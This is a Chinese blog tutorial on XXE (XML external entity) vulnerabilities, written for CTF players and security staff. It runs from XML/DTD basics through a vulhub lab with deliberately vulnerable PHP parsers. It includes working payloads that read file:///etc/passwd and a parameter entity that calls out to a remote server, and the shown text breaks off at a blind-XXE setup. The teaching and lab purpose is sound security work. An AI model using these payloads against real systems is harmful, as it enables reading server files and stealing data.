<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Lobster Two:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="web安全,">










<meta name="description" content="首发于  Ms08067安全实验室 前言写这篇的主要目的是因为很多CTFer还有一些安全人员不是很清楚xxe漏洞，还有在面试当中，xxe漏洞也经常被问到，所以就写这么一篇文章来学习xxe漏洞.本篇会结合一些靶场还有CTF来进行讲解 基础首先来介绍一下XML和DTD XML被设计用来传输和存储数据,这里提一下xml与html的区别:HTML 旨在显示信息，而 XML 旨在传输信息 而DTD定义 XM">
<meta name="keywords" content="web安全">
<meta property="og:type" content="article">
<meta property="og:title" content="XXE漏洞原理及实战">
<meta property="og:url" content="https://style-404.github.io/2019/06/01/XXE漏洞原理及实战/index.html">
<meta property="og:site_name" content="可乐&#39;blog">
<meta property="og:description" content="首发于  Ms08067安全实验室 前言写这篇的主要目的是因为很多CTFer还有一些安全人员不是很清楚xxe漏洞，还有在面试当中，xxe漏洞也经常被问到，所以就写这么一篇文章来学习xxe漏洞.本篇会结合一些靶场还有CTF来进行讲解 基础首先来介绍一下XML和DTD XML被设计用来传输和存储数据,这里提一下xml与html的区别:HTML 旨在显示信息，而 XML 旨在传输信息 而DTD定义 XM">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2rk26rhefj30ge05m0u0.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2vh6q4wo1j30o60bct9m.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2wcj6j2ikj30i50ae74o.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2vhxcxhcqj30zr0fjq57.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2xdsskoncj30zi0c40uv.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2xdwdbbauj30z90boac5.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g337a098y7j30ph06owen.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g337pc5fb8j30ei05p75j.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g337r3kctyj31qm0jgdjc.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2wpe05i33j30rc0b5jsf.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2wph8hlvij30wj0cldh4.jpg">
<meta property="og:updated_time" content="2019-06-01T07:41:38.866Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XXE漏洞原理及实战">
<meta name="twitter:description" content="首发于  Ms08067安全实验室 前言写这篇的主要目的是因为很多CTFer还有一些安全人员不是很清楚xxe漏洞，还有在面试当中，xxe漏洞也经常被问到，所以就写这么一篇文章来学习xxe漏洞.本篇会结合一些靶场还有CTF来进行讲解 基础首先来介绍一下XML和DTD XML被设计用来传输和存储数据,这里提一下xml与html的区别:HTML 旨在显示信息，而 XML 旨在传输信息 而DTD定义 XM">
<meta name="twitter:image" content="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2rk26rhefj30ge05m0u0.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://style-404.github.io/2019/06/01/XXE漏洞原理及实战/">





  <title>XXE漏洞原理及实战 | 可乐'blog</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">可乐'blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-schedule">
          <a href="/schedule/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-calendar"></i> <br>
            
            日程表
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://style-404.github.io/2019/06/01/XXE漏洞原理及实战/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="筱阳">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="可乐'blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XXE漏洞原理及实战</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-06-01T15:25:12+08:00">
                2019-06-01
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/web安全/" itemprop="url" rel="index">
                    <span itemprop="name">web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><meta name="referrer" content="no-referrer"><br>首发于  Ms08067安全实验室</p>
<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>写这篇的主要目的是因为很多CTFer还有一些安全人员不是很清楚xxe漏洞，还有在面试当中，xxe漏洞也经常被问到，所以就写这么一篇文章来学习xxe漏洞.<br>本篇会结合一些靶场还有CTF来进行讲解</p>
<h1 id="基础"><a href="#基础" class="headerlink" title="基础"></a>基础</h1><p>首先来介绍一下XML和DTD</p>
<p>XML被设计用来传输和存储数据,这里提一下xml与html的区别:HTML 旨在显示信息，而 XML 旨在传输信息</p>
<p>而DTD定义 XML 文档的合法构建模块,它使用一系列的合法元素来定义文档结构,DTD 可被成行地声明于 XML 文档中，也可作为一个外部引用。</p>
<h2 id="XML和DTD基础"><a href="#XML和DTD基础" class="headerlink" title="XML和DTD基础"></a>XML和DTD基础</h2><p>一个 XML 文档实例：<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">note</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">to</span>&gt;</span>George<span class="tag">&lt;/<span class="name">to</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">from</span>&gt;</span>John<span class="tag">&lt;/<span class="name">from</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">heading</span>&gt;</span>Reminder<span class="tag">&lt;/<span class="name">heading</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span>Don't forget the meeting!<span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">note</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>第一行是 XML 声明。它定义 XML 的版本 (1.0) 和所使用的编码 (ISO-8859-1 = Latin-1/西欧字符集)。</p>
<p>接下来加上DTD进行声明</p>
<p><strong>内部的 DOCTYPE 声明</strong></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0"?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE note [          //定义此文档是 note 类型的文档。</span></span><br><span class="line"><span class="meta">  &lt;!ELEMENT note (to,from,heading,body)&gt; //定义 note 元素有四个元素："to、from、heading,、body"</span></span><br><span class="line"><span class="meta">  &lt;!ELEMENT to      (#PCDATA)&gt;  //定义 to 元素为 "#PCDATA" 类型</span></span><br><span class="line"><span class="meta">  &lt;!ELEMENT from    (#PCDATA)&gt;   //定义 from 元素为 "#PCDATA" 类型</span></span><br><span class="line"><span class="meta">  &lt;!ELEMENT heading (#PCDATA)&gt;  // heading 元素为 "#PCDATA" 类型</span></span><br><span class="line"><span class="meta">  &lt;!ELEMENT body    (#PCDATA)&gt;  //定义 body 元素为 "#PCDATA" 类型</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">note</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">to</span>&gt;</span>George<span class="tag">&lt;/<span class="name">to</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">from</span>&gt;</span>John<span class="tag">&lt;/<span class="name">from</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">heading</span>&gt;</span>Reminder<span class="tag">&lt;/<span class="name">heading</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">body</span>&gt;</span>Don't forget the meeting!<span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">note</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><strong>DTD元素</strong><br>在一个 DTD 中，元素通过元素声明来进行声明。</p>
<p>声明一个元素<br>在 DTD 中，XML 元素通过元素声明来进行声明。元素声明使用下面的语法：</p>
<p>只有 PCDATA 的元素<br>只有 PCDATA 的元素通过圆括号中的 #PCDATA 进行声明：</p>
<p>&lt;!ELEMENT 元素名称 (#PCDATA)&gt;<br>例子：<br><code>&lt;!ELEMENT from (#PCDATA)&gt;</code></p>
<p>带有任何内容的元素<br>通过类别关键词 ANY 声明的元素，可包含任何可解析数据的组合：</p>
<p>&lt;!ELEMENT 元素名称 ANY&gt;<br>例子：<br><code>&lt;!ELEMENT note ANY&gt;</code></p>
<p>带有子元素（序列）的元素<br>带有一个或多个子元素的元素通过圆括号中的子元素名进行声明：</p>
<p>&lt;!ELEMENT 元素名称 (子元素名称 1)&gt;<br>或者</p>
<p>&lt;!ELEMENT 元素名称 (子元素名称 1,子元素名称 2,…..)&gt;<br>例子：<br><code>&lt;!ELEMENT note (to,from,heading,body)&gt;</code></p>
<p>声明只出现一次的元素<br>&lt;!ELEMENT 元素名称 (子元素名称)&gt;<br>例子：<br><code>&lt;!ELEMENT note (message)&gt;</code><br>上面的例子声明了：message 子元素必须出现一次，并且必须只在 “note” 元素中出现一次。</p>
<p><strong>外部文档声明</strong><br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE 根元素<span class="built_in"> SYSTEM </span><span class="string">"文件名"</span>&gt;</span><br></pre></td></tr></table></figure></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0"?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE note SYSTEM "note.dtd"&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">note</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">to</span>&gt;</span>George<span class="tag">&lt;/<span class="name">to</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">from</span>&gt;</span>John<span class="tag">&lt;/<span class="name">from</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">heading</span>&gt;</span>Reminder<span class="tag">&lt;/<span class="name">heading</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span>Don't forget the meeting!<span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">note</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>这个 XML 文档和上面的 XML 文档相同，但是拥有一个外部的 DTD<br>这是包含 DTD 的 “note.dtd” 文件：<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ELEMENT<span class="built_in"> note </span>(<span class="keyword">to</span>,<span class="keyword">from</span>,heading,body)&gt;</span><br><span class="line">&lt;!ELEMENT <span class="keyword">to</span> (#PCDATA)&gt;</span><br><span class="line">&lt;!ELEMENT <span class="keyword">from</span> (#PCDATA)&gt;</span><br><span class="line">&lt;!ELEMENT heading (#PCDATA)&gt;</span><br><span class="line">&lt;!ELEMENT body (#PCDATA)&gt;</span><br></pre></td></tr></table></figure></p>
<h2 id="DTD实体声明"><a href="#DTD实体声明" class="headerlink" title="DTD实体声明"></a>DTD实体声明</h2><p>重点介绍实体声明<br><strong>内部实体声明</strong><br><code>&lt;!ENTITY 实体名称 &quot;实体的值&quot;&gt;</code><br>DTD 例子:<br><figure class="highlight erlang-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY writer <span class="string">"Bill Gates"</span>&gt;</span><br></pre></td></tr></table></figure></p>
<p>将writer 声明为”Bill Gates”，copyright 声明为 “Copyright W3School.com.cn”<br>XML 例子:<br><code>&lt;author&gt;&amp;writer;&amp;copyright;&lt;/author&gt;</code><br>注释: 一个实体由三部分构成: 一个和号 (&amp;), 一个实体名称, 以及一个分号 (;)。<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE foo [</span></span><br><span class="line"><span class="meta">	&lt;!ENTITY xxe  "sec test" &gt;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">name</span>&gt;</span>&amp;xxe;<span class="tag">&lt;/<span class="name">name</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p><strong>外部实体声明</strong><br>外部实体引用支持通过协议，来动态的获取值<br><code>&lt;!ENTITY 实体名称 SYSTEM &quot;URI/URL&quot;&gt;</code><br>例子：<br>DTD 例子:<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY writer<span class="built_in"> SYSTEM </span><span class="string">"http://www.w3school.com.cn/dtd/entities.dtd"</span>&gt;</span><br><span class="line">&lt;!ENTITY copyright<span class="built_in"> SYSTEM </span><span class="string">"http://www.w3school.com.cn/dtd/entities.dtd"</span>&gt;</span><br></pre></td></tr></table></figure></p>
<p>XML 例子:<br><code>&lt;author&gt;&amp;writer;&amp;copyright;&lt;/author&gt;</code><br>可以通过<code>file://</code>协议来读取文件内容<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE foo [</span></span><br><span class="line"><span class="meta">	&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">name</span>&gt;</span>&amp;xxe;<span class="tag">&lt;/<span class="name">name</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>不同语言支持的协议不同<br><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2rk26rhefj30ge05m0u0.jpg" alt=""></p>
<p><strong>参数实体</strong>：<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY % 实体名称 <span class="string">"实体的值"</span>&gt;</span><br><span class="line"><span class="keyword">or</span></span><br><span class="line">&lt;!ENTITY % 实体名称<span class="built_in"> SYSTEM </span><span class="string">"URI"</span>&gt;</span><br></pre></td></tr></table></figure></p>
<p>参数实体只能在DTD中申明，DTD中引用，它们使用百分号(%)而不是与字符(&amp;)，可以是命名实体或外部实体。，能够解析实体或者uri，进行xml解析，进而获得其中的变量<br>注:一般用于Bline XXE<br><figure class="highlight erlang-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY <span class="comment">% style "2333"&gt;</span></span><br><span class="line">&lt;!ENTITY <span class="comment">% test "%style"&gt;</span></span><br></pre></td></tr></table></figure></p>
<p><strong>公共实体声明</strong><br><figure class="highlight erlang-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY 实体名称 PUBLIC <span class="string">"public_ID"</span> <span class="string">"URI"</span>&gt;</span><br></pre></td></tr></table></figure></p>
<h1 id="XXE漏洞"><a href="#XXE漏洞" class="headerlink" title="XXE漏洞"></a>XXE漏洞</h1><p>当允许引用外部实体时，通过构造恶意内容，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。<br>xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件</p>
<p>如果xml能够被解析，比如输入<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE ANY [</span></span><br><span class="line"><span class="meta">&lt;!ENTITY name "my name is nMask"&gt;]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span>&amp;name;<span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>如果页面输出了my name is nMask，说明xml文件可以被解析。</p>
<p>接下来测试是否支持DTD引用外部实体而导致xxe注入<br><figure class="highlight mojolicious"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml"><span class="meta">&lt;?xml version=”1.0” encoding=”UTF-8”?&gt;</span></span></span><br><span class="line"><span class="xml"><span class="meta">&lt;!DOCTYPE ANY [</span></span></span><br><span class="line"><span class="xml"><span class="tag">&lt;<span class="name">!ENTITY</span> % <span class="attr">name</span> <span class="attr">SYSTEM</span> "<span class="attr">http:</span>//<span class="attr">localhost</span>/<span class="attr">index.html</span>"&gt;</span></span></span><br><span class="line"><span class="xml"></span><span class="perl">%name;</span><span class="xml"></span></span><br><span class="line"><span class="xml">]&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>可通过查看自己服务器上的日志来判断，看目标服务器是否向你的服务器发了一条请求index.html的请求。</p>
<p>接下里安装漏洞环境</p>
<p>本人在centos下，安装docker后<br>git clone <a href="https://github.com/vulhub/vulhub.git" target="_blank" rel="noopener">https://github.com/vulhub/vulhub.git</a><br>进入/vulhub/vulhub/tree/master/php/php_xxe<br>输入<code>pip install docker-compose</code>即可<br>环境启动后，访问<a href="http://your-ip:8080/index.php即可看到phpinfo" target="_blank" rel="noopener">http://your-ip:8080/index.php即可看到phpinfo</a></p>
<p>www目录包含四个文件<br><figure class="highlight axapta"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">├── dom.php <span class="meta"># 示例：使用DOMDocument解析body</span></span><br><span class="line">├── <span class="keyword">index</span>.php <span class="meta">#phpinfo()</span></span><br><span class="line">├── SimpleXMLElement.php <span class="meta"># 示例：使用SimpleXMLElement类解析body</span></span><br><span class="line">└── simplexml_load_string.php <span class="meta"># 示例：使用simplexml_load_string函数解析body</span></span><br><span class="line">`</span><br></pre></td></tr></table></figure></p>
<p>SimpleXMLElement.php<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">$data = file_get_contents(<span class="string">'php://input'</span>);</span></span><br><span class="line"><span class="php">$xml = <span class="keyword">new</span> SimpleXMLElement($data);  <span class="comment">//解析xml</span></span></span><br><span class="line"><span class="php"><span class="keyword">echo</span> $xml-&gt;name;</span></span><br></pre></td></tr></table></figure></p>
<p>dom.php<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">$data = file_get_contents(<span class="string">'php://input'</span>);</span></span><br><span class="line"><span class="php">$dom = <span class="keyword">new</span> DOMDocument();</span></span><br><span class="line"><span class="php">$dom-&gt;loadXML($data);</span></span><br><span class="line"><span class="php">print_r($dom);</span></span><br></pre></td></tr></table></figure></p>
<p>simplexml_load_string.php<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">$data = file_get_contents(<span class="string">'php://input'</span>);</span></span><br><span class="line"><span class="php">$xml = simplexml_load_string($data);</span></span><br><span class="line"><span class="php"><span class="keyword">echo</span> $xml-&gt;name;</span></span><br></pre></td></tr></table></figure></p>
<p>首先测试是否能够解析xml</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="utf-8"?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE root [</span></span><br><span class="line"><span class="meta">&lt;!ENTITY writer "Bill Gates"&gt;</span></span><br><span class="line"><span class="meta">&lt;!ENTITY copyright "Copyright W3School.com.cn"&gt;</span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">name</span>&gt;</span>&amp;writer;&amp;copyright;<span class="tag">&lt;/<span class="name">name</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2vh6q4wo1j30o60bct9m.jpg" alt=""><br><strong>内部实体</strong><br><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2wcj6j2ikj30i50ae74o.jpg" alt=""></p>
<p><strong>外部实体</strong><br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0" encoding="utf-8"?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE root[</span></span><br><span class="line"><span class="meta">&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">name</span>&gt;</span>&amp;xxe;<span class="tag">&lt;/<span class="name">name</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/005RaR9Jgy1g2vhxcxhcqj30zr0fjq57.jpg" alt=""></p>
<p><strong>参数实体</strong></p>
<p>当没有回显即没有这个语句的时候<code>echo $xml-&gt;name;</code>该怎么办呢<br>这个时候我们可以利用参数实体，通过发起http请求来攻击。</p>
<p>先进行参数实体声明看看~<br>在远程服务器新建xxe.dtd文件，内容为：<br><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;!ENTITY evil<span class="built_in"> SYSTEM </span><span class="string">"file:///etc/passwd"</span> &gt;</span><br></pre></td></tr></table></figure></p>
